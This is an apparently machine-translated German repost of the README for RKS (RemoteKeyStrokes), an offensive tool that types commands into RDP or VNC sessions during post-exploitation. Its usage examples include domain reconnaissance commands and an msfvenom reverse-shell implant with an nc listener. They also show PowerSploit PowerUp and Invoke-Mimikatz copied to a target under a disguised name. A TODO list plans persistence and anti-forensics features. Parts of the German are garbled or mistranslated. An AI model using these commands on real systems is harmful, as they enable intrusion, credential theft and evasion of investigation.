Ein Skript zur Automatisierung von Tastenanschlägen über ein grafisches Desktop-Programm



Ein Skript zur Automatisierung von Tastenanschlägen durch eine aktive Remote-Desktop Sitzung, die offensive Betreiber in Kombination mit unterstützt vom Land leben Techniken.

Über RKS (RemoteKeyStrokes)

Alle Credits gehen an nopernik dafür, dass ich es möglich gemacht habe, also habe ich es mir zur Aufgabe gemacht, es zu verbessern. Ich wollte etwas, das währenddessen hilft Post-Ausbeutung Phase beim Ausführen von Befehlen über einen Remote-Desktop.

Hilfemenü

$ ./rks.sh -h
Usage: ./rks.sh (RemoteKeyStrokes)
Options:
-c, --command <command | cmdfile> Specify a command or a file containing to execute
-i, --input <input_file> Specify the local input file to transfer
-o, --output <output_file> Specify the remote output file to transfer
-m, --method <method> Specify the file transfer or execution method
(For file transfer "base64" is set by default if
not specified. For execution method "none" is set
by default if not specified)

-p, --platform <operating_system> Specify the operating system (windows is set by
default if not specified)

-w, --windowname <name> Specify t he window name for graphical remote
program (freerdp is set by default if not
specified)

-h, --help Display this help message

Verwendung

Interne Aufklärung

  • Beim Ausführen in der Eingabeaufforderung
$ cat recon_cmds.txt
whoami /all
net user
net localgroup Administrators
net user /domain
net group "Domain Admins" /domain
net group "Enterprise Admins" /domain
net group "Domain Computers" /domain

$ ./rks.h -c recon_cmds.txt

Implantation ausführen

  • Führen Sie eine Implantation aus, während Sie den Inhalt der Nutzlast in Powershell lesen.
$ msfvenom -p windowx/x64/shell_reverse_tcp lhost=<IP> lport=4444 -f psh -o implant.ps1

$ ./rks.sh -c implant.ps1

$ nc -lvnp 4444

Datei Übertragung

  • Übertragen Sie eine Datei aus der Ferne, wenn Sie in einem isolierten Netzwerk schwenken. Wenn Sie den Remote-Pfad unter Windows angeben möchten, müssen Sie unbedingt Anführungszeichen einfügen.
$ ./rks.sh -i /usr/share/powersploit/Privesc/PowerUp.ps1 -o script.ps1

$ ./rks.sh -i /usr/share/powersploit/Exfiltration/Invoke-Mimikatz.ps1 -o "C:\Windows\Temp\update.ps1" -m base64

Geben Sie die grafische Remote-Software an

  • Wenn Sie auf VNC-Netzwerkprotokolle abzielen, können Sie den Fensternamen mit angeben tightvnc.

$ ./rks.sh -i implant.ps1 -w tightvnc

$ ./rks.sh -i implant.bat -w rdesktop

TODO und Hilfe gesucht

  • Fügen Sie Textfarben hinzu, um die Benutzererfahrung zu verbessern

  • Implementieren Sie die Base64-Dateiübertragung

  • Implementieren Sie die Bin2Hex-Dateiübertragung

  • Implementieren Sie eine Persistenzfunktion für Windows und Linux.

  • Implementieren Antiforensik Funktion sowohl für Windows als auch für Linux.

  • Implementieren Sie, um Shellcode-Eingaben zu lesen und C#-Implantat und Powershell-Runspace auszuführen

  • Implementieren Sie die Privesc-Funktion sowohl für Windows als auch für Linux

Verweise

Credits



Source link

Loading...